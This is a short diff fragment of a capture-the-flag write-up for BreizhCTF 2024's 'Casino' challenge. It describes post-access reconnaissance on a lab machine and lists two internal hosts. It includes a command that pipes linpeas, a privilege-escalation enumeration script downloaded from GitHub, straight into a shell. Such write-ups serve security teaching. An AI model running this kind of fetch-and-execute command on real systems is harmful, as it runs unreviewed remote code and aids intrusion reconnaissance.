polo-le-rigolo/writeup/BREIZHCTF/2024/Casino_WU.md

 Our machine has an ip in the 10.35.122.0/24 subnet (10.35.122.10) No suspicious files or process were running on the machine, sudo -l was password protected but when looking at /usr/bin/ we noticed python3, curl and nmap.
-Let's try to learn a little more about our environnement with linpeas : `curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh`
+Let's try to learn a little more about our environnement with linpeas : `curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh`.
 No interesting privesc related information but in the network session linpeas found two interesting servers in our subnet :
 `10.35.122.11 meetingcam meetingcam`
 `10.35.122.20 bastion bastion`